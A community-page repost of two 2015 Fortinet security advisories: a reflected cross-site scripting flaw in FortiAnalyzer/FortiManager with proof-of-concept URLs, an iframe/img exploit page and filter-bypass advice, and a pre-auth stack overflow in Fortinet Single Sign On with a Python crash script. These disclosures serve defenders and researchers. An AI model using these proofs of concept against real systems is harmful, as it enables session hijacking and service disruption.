Search the Community

Document Title: =============== Fortinet FortiAnalyzer & FortiManager - Client Side Cross Site Scripting Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1354 Security Bulletin FortiGuard: http://www.fortiguard.com/advisory/FG-IR-15-005/ PSIRT ID: 1327458 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3620 CVE-ID: ======= CVE-2015-3620 Release Date: ============= 2015-05-05 Vulnerability Laboratory ID (VL-ID): ==================================== 1354 Common Vulnerability Scoring System: ==================================== 3.5 Product & Service Introduction: =============================== FortiAnalyzer Centralized Logging and Reporting Appliances securely aggregate, analyze, and report on network log data gathered from Fortinet Network Security Appliances and other syslog-compatible devices. You can analyze and manage a wide range of data, including security events, network traffic, Web content, and email, to measure your security posture regulatory compliance. FortiAnalyzer is one of several versatile, adaptive Fortinet Network Security Management Products that support diverse deployment types, growth flexibility, advanced customization through APIs and simple licensing. Versatile models are designed for large organizations and multi-tenant environments, smaller networks and mid-enterprise organizations (Copy of the Vendor Homepage: http://www.fortinet.com/products/fortianalyzer/network-security-logging-reporting.html ) The FortiAnalyzer Virtual Security Reporting Appliances securely aggregate log data from Fortinet devices and other syslog-compatible devices. Using a comprehensive suite of easily-customized reports, users can filter and review records, including traffic, event, virus, attack, Web content, and email data, mining the data to determine your security stance and assure regulatory compliance. (Copy of the Vendor Homepage: http://www.fortinet.com/products/fortianalyzer/virtual-security-reporting.html ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a client-side vulnerability in the Fortinet FortiAnalyzer & FortiManager v5.2 appliance web-application. Vulnerability Disclosure Timeline: ================================== 2014-12-01: Researcher Notification & Coordination (Benjamin Kunz Mejri) 2014-12-02: Vendor Notification 1 (Fortiguard Security - CERT Team) 2015-02-10: Vendor Notification 2 (Fortiguard Security - CERT Team) 2015-02-13: Vendor Response/Feedback (Fortiguard Security - CERT Team) 2015-04-30: Vendor Fix/Patch (Fortinet Developer Team) 2015-05-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Fortinet Product: FortiAnalyzer & FortiManager - Appliance Web Application 5.2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A non-persistent input validation web vulnerability has been discovered in the official Fortinet FortiAnalyzer & FortiManager v5.2 appliance web-application. The security vulnerability allows remote attackers to manipulate client-side application to browser requests to compromise user/admin session information. The vulnerability is located in the `query and name` values of the `Reports > Advanced > Dataset > View Dataset` module. Remote attackers are able to inject malicious script codes to client-side application requests. Remote attackers are able to prepare special crafted weblinks to execute client-side script code that compromises the fortinanalyzer user/admin session data. The execution of the script code occurs in the test query display module. The attack vector of the vulnerability is located on the client-side of the online-service and the request method to inject or execute the code is GET. The appliance web-application filter prevents to execute script code tags after the request by the vulnerable inputs. To bypass the validation filter and protection mechanism of the fortinalayzer use the img, embed and iframe tags with onload to inject client-side script code. The problem is that the input filter does not capture the the context with the correct encoding as result the code bypass the filter of the appliance and executes as dom. The security risk of the non-persistent cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the non-persistent cross site scripting web vulnerability requires no privileged web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of malicious script codes or non-persistent web module context manipulation. Request Method(s): [+] GET Vulnerable Module(s): [+] Reports > Advanced > Dataset Vulnerable Parameter(s): [+] name [+] query Affected Module(s): [+] View Dataset - SQL RUN Query Display During the client security tests the research team noticed that the official vm version and the all appliance models are affected by the security issue. The following versions and models of the fortinet fortianalyzer appliance web-application are affected by the remote cross site scripting vulnerability. Affected Model(s): [+] FortiManager 5.2.0 GA, 5.2.1 GA [+] FortiManager 5.0.3 GA to 5.0.10 GA release [+] FortiAnalyzer 5.0.0 GA to 5.2.1 GA release Affected Version(s): [+] 5.2.0, 5.2.1, 5.0.3 to 5.0.10 & 5.0.0 to 5.21 (GA) Proof of Concept (PoC): ======================= PoC: https://fortianalyzer.127.0.0.1:8080/p/report/dataset/sql/run/?logtype=1&device-list=%5B%22FGT60C3G12031338%5Broot%5D%22%5D& time-period=%7B%22week-start%22%3A0%2C%22period-opt%22%3A1%2C%22period-type%22%3A5%7D&sql-query=%20[NON-PERSISTENT INPUT VALIDATION VULNERABILITY!])%20%3C https://fortimanager.127.0.0.1:8080/p/report/dataset/sql/run/?logtype=1&device-list=%5B%22All_FortiGates%22%5D&time-period=%7B%22 week-start%22%3A0%2C%22period-opt%22%3A1%2C%22period-type%22%3A5%7D&sql-query=%20[NON-PERSISTENT INPUT VALIDATION VULNERABILITY!])%20%3C Exploit: PoC <html> <head><body> <title>Fortianalyzer & Fortimanager- Dataset "Query" - Cross Site Scripting PoC</title> <iframe src=https://fortianalyzer.127.0.0.1:8080/p/report/dataset/sql/run/?logtype=1&device-list=%5B%22FGT60C3G12031338%5Broot%5D%22%5D& time-period=%7B%22week-start%22%3A0%2C%22period-opt%22%3A1%2C%22period-type%22%3A5%7D&sql-query=%20[NON-PERSISTENT INPUT VALIDATION VULNERABILITY!])%20%3C> <br> <img src=https://fortianalyzer.127.0.0.1:8080/p/report/dataset/sql/run/?logtype=1&device-list=%5B%22FGT60C3G12031338%5Broot%5D%22%5D& time-period=%7B%22week-start%22%3A0%2C%22period-opt%22%3A1%2C%22period-type%22%3A5%7D&sql-query=%20[NON-PERSISTENT INPUT VALIDATION VULNERABILITY!])%20%3C> <br> <iframe src=https://fortimanager.127.0.0.1:8080/p/report/dataset/sql/run/?logtype=1&device-list=%5B%22All_FortiGates%22%5D&time-period=%7B%22 week-start%22%3A0%2C%22period-opt%22%3A1%2C%22period-type%22%3A5%7D&sql-query=%20[NON-PERSISTENT INPUT VALIDATION VULNERABILITY!])%20%3C> <br> <img src=https://fortimanager.127.0.0.1:8080/p/report/dataset/sql/run/?logtype=1&device-list=%5B%22All_FortiGates%22%5D&time-period=%7B%22 week-start%22%3A0%2C%22period-opt%22%3A1%2C%22period-type%22%3A5%7D&sql-query=%20[NON-PERSISTENT INPUT VALIDATION VULNERABILITY!])%20%3C> </body></head> </html> Source: Reports > Advanced > Dataset > View Dataset (1) > Query & Name <tr id="yui_3_5_0_1_1417083590427_1543"> <td id="yui_3_5_0_1_1417083590427_1542" colspan="2"> <input id="id_test_sql" value="Test" type="button"> </td> </tr> <!-- Output Console --> <tr> <td colspan="2" id="id_sql_console_output_td"> <div id="id_sql_console_output" class="yui3-skin-sam"><pre><code>ERROR: unterminated quoted identifier at or near ""><[NON-PERSISTENT INJECTED SCRIPT CODE!]) < ^ </pre></code></iframe></code></pre></div> <img id="id_query_response_waiting" src="/resource/images/loading.gif" style="display: none;" hidden="true"></td> </tr> </tbody> --- PoC Session Logs [GET] --- Status: 200[OK] GET https://fortianalyzer.127.0.0.1:8080/p/report/dataset/sql/run/?logtype=1&device-list=%5B%22FGT60C3G12031338%5Broot%5D%22%5D&time-period=%7B%22week-start%22%3A0%2C%22period-opt%22%3A1%2C%22period-type%22%3A5%7D&sql-query=%20[NON-PERSISTENT INPUT VALIDATION VULNERABILITY!])%20%3C Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json] Request Header: Host[fortianalyzer.127.0.0.1:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] X-CSRFToken[55cee37b45599df7afe8bdd27e66bc11] Referer[https://fortianalyzer.127.0.0.1:8080/p/report/dataset/list/html/?nocache=0.12978551249494386] Cookie[remoteauth=1; forRevert=0; vmConfirm=; tabPosition=; showSlave=1; add_dev_later=; auth_state=; CURRENT_SESSION=adwnZNbPJngbWvfmq6fFOjzR6pTT5dcsNud9dBOKw7orgbIzILoaor9Mn/6C825kjXLetWGNQvLlNJpt50Gbzw= csrftoken=55cee37b45599df7afe8bdd27e66bc11] Connection[keep-alive] Response Header: Server[Apache] Expires[-1] Pragma[no-cache] Cache-Control[no-cache] Vary[Accept-Encoding] Content-Encoding[gzip] Keep-Alive[timeout=30, max=72] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[application/json; charset=UTF-8] - Status: 200[OK] GET https://127.0.0.1:8080/p/report/dataset/list/html/x[NON-PERSISTENT INJECTED SCRIPT CODE!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[127.0.0.1:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://127.0.0.1:8080/p/report/dataset/list/html/?nocache=0.12978551249494386] Cookie[remoteauth=1; forRevert=0; vmConfirm=; tabPosition=; showSlave=1; add_dev_later=; auth_state=; CURRENT_SESSION=adwnZNbPJngbWvfmq6fFOjzR6pTT5dcsNud9dBOKw7orgbIzILoaor9Mn/6C825kjXLetWGNQvLlNJpt50Gbzw= csrftoken=55cee37b45599df7afe8bdd27e66bc11] Connection[keep-alive] Response Header: Date[Thu, 27 Nov 2014 10:23:54 GMT] Server[Apache] Vary[Cookie,Accept-Encoding] Set-Cookie[csrftoken=55cee37b45599df7afe8bdd27e66bc11; expires=Thu, 26-Nov-2015 10:23:54 GMT; Max-Age=31449600; Path=/] Content-Encoding[gzip] Keep-Alive[timeout=30, max=70] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html; charset=utf-8] Reference(s): https://fortianalyzer.127.0.0.1:8080/p/report/ https://fortianalyzer.127.0.0.1:8080/p/report/dataset/ https://fortianalyzer.127.0.0.1:8080/p/report/dataset/list/ https://fortianalyzer.127.0.0.1:8080/p/report/dataset/list/html/ https://fortianalyzer.127.0.0.1:8080/p/report/dataset/sql/ https://fortianalyzer.127.0.0.1:8080/p/report/dataset/sql/run/ Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable name and query input fields in the data set view module. Restrict the input fields and disallow special chars. Encode the test code display output to prevent client-side script code injection attacks. Security Risk: ============== The security risk of the client-side cross site scripting vulnerability in the dataset view module is estimated as medium. (CVSS 3.5) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - Evolution Security GmbH ™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

1. Advisory Information Title: Fortinet Single Sign On Stack Overflow Advisory ID: CORE-2015-0006 Advisory URL: http://www.coresecurity.com/advisories/fortinet-single-sign-on-stack-overflow Date published: 2015-03-18 Date of last update: 2015-03-18 Vendors contacted: Fortinet Release mode: Coordinated release 2. Vulnerability Information Class: Stack-based Buffer Overflow [CWE-121] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-2281 3. Vulnerability Description Through Fortniet [1] "Single Sign On" or "Single User Sign On" users logged on to a computer network are authenticated for access to network resources through the FortiGate unit without having to enter their username and password again. Fortinet Single Sign On (FSSO) provides Single Sign On capability for Microsoft Windows networks using either Active Directory or NTLM authentication and Novell networks, using eDirectory. FSSO [4] monitors user logons and sends the FortiGate unit the username, IP address, and the list of Windows AD user groups to which the user belongs. When the user tries to access network resources, the FortiGate unit selects the appropriate security policy for the destination. If the user belongs to one of the permitted user groups, the connection is allowed. There is a vulnerability in the message dispatcher used by FSSO Windows Active Directory and FSSO Novell eDirectory. Exploitation of this vulnerability might lead to a full network compromise. 4. Vulnerable packages - FSSO Windows Active Directory 4.3.0161 (4.3.0151, 4.3.0129 were also tested and found vulnerable) - FSSO Novell eDirectory 4.3.0161 Other versions are probably affected too, but they were not checked. 5. Vendor Information, Solutions and Workarounds Core Security recommends those affected use third party software such as Sentinel [3] or EMET [2] that could help to prevent the exploitation of affected systems to some extent. Fortinet published the following FortiGuard Bulletin: [5] 6. Credits This vulnerability was discovered and researched by Enrique Nissim in collaboration with Andres Lopez Luksenberg, both from the Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team. 7. Technical Description / Proof of Concept Code [CVE-2015-2281] The vulnerability in both cases can be exploited by sending a special packet to the services without being authenticated (pre-auth). Given that both software systems require and Administrative account in order to run, (Windows Domain Admin or eDirectory Admin accordingly) the full network is exposed. Pre-authenticated Remote Code Execution with Domain Administrative rights is possible. The vulnerability is located in the Message Dispatcher for message PROCESS_HELLO. Here is a PoC (Proof of Concept) that causes the application thread with the FortiGate appliance to crash: import socket import struct TARGET_IP = "192.168.233.100" def play(): message = "\x80\x01\x42\x42" buff = "A"*248 buff += "B" * (0xfffff - len(buff)) payload = struct.pack(">I", 0x000fffff) + message + buff s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, 8000)) s.send(payload) buff_recv = s.recv(6000) print buff_recv s.close() play() 8. Report Timeline 2015-01-07: Core Security notifies Fortinet of the vulnerabilities. Publication date is set for February 2nd, 2015. 2015-01-09: Fortinet requests a copy of the advisory draft. 2015-01-09: Core Security sends a draft copy of the advisory to the vendor. 2015-01-14: Fortinet informs they are in the process of validating the report and asks if we want to commit to responsible disclosure. 2015-01-14: Core Security informs the vendor that our policy is to publish our findings in order to help the users to gain awareness of the issues and therefore allowing them to take the necessary precautions to protect themselves. We informed them that we always try to release our findings in a coordinate manner provided that the time the vendor takes to test and fix the issue is reasonable and the publication of this solution and our disclosure is agreed between the two parties. 2015-01-21: Core Security asks the vendor if they were able to review the vulnerabilities and a tentative date for publishing the fix and consequently the advisory. 2015-01-27: Fortinet acknowledges the vulnerabilities and informs that a fix of the source code is in order. The say they'll keep us updated regarding the release schedule. 2015-02-24: Fortinet informed us that the current ETA was the first week of March, but that it could be changed depending on their engineering load. 2015-02-24: Core Security requested a specific date considering that the first week of March was next week. 2015-02-27: Fortinet informed us that they currently don't have a fixed date. Additionally they sent us the link where their FortiGuard Bulletin is going to be published. They requested the CVE ID we are going to assign this issue. 2015-03-05: Core Security informs Fortinet that we still don´t have a CVE ID to share with them because we haven't received one from Mitre yet. 2015-03-05: Fortinet informed us that they were discussing when they were going to release the fix/update, and that they will provide us an ETA tomorrow. 2015-03-06: Fortinet informed us that their new ETA is March 11th, 2015. They clarify this is not a fixed date. 2015-03-11: Fortinet informed us that they postponed to the end of the week or next week the ETA of FortiOS 5.2.3. 2015-03-13: Core Security asks Fortinet about the status of the ETA for the fix/update. Additionally we recommended not to release it on a Friday in order to give the affected users the required time to apply the fix. 2015-03-16: Core Security asks Fortinet if they could send us their estimated ETA for the fix/update. 2015-03-16: Fortinet informed us that the current ETA is March 17th or March 18th. 2015-03-18: Advisory CORE-2015-0006 published. 9. References [1] http://www.fortinet.com/. [2] http://support.microsoft.com/kb/2458544. [3] https://github.com/CoreSecurity/sentinel. [4] http://docs-legacy.fortinet.com/cb/html/index.html#page/FOS_Cookbook/Authentication/FSSO-IBP.html. [5] http://www.fortiguard.com/advisory/FG-IR-15-006/. 10. About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. About Core Security Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. Disclaimer The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. Source